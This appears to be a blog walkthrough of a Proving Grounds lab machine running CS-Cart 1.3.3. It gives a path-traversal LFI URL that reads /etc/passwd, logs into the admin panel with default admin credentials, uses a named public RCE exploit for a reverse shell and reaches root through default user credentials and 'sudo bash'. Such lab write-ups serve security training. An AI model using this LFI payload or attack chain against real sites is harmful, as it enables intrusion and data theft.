Enumeration

Nmap

Initial nmap scan revealed SSH, HTTP and some mail ports were open.

00nmap

Web Enumeration

Visiting the website revealed it was CS-Cart website.

01web

Later, I searched how to find CS-Cart version and found this post (https://forum.cs-cart.com/t/how-to-find-my-cs-cart-version/13327) which explains all you need to do is add ?version to your website like this http://test.com/?version. So I did it and found out it was CS-Cart 1.3.3.

02version

Exploitation

CS-Cart 1.3.3 LFI

This version was vulnerable to LFI via below URL.

http://<IP>/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

So I simply searched it and found out there was a user named patrick.

03LFI

CS-Cart 1.3.3 RCE

This version was also vulnerable to malicious file upload leading to RCE. I found an exploit reatva/CS-Cart-1.3.3-RCE. It needed admin login so at first I tried to login admin page. I only used default admin:admin credentials and it worked.

04admin

05admin admin

Later, I simply executed the exploit and got reverse shell as www-data.

06exploit

07rev

And I read the user flag.

08flag

Privilege Escalation

default credentials and sudo ALL

Later, I tried many methods but non of them worked. This was an old system and I could not execute anything.

I then tried default credentials patrick:patrick and it worked. Moreover, calling sudo -l revealed I could run ALL commands as sudo. So I simply executed sudo bash and got root.

09root

<
Previous Post
Sea - Proving Grounds Practice
>
Next Post
Snookums - Proving Grounds Practice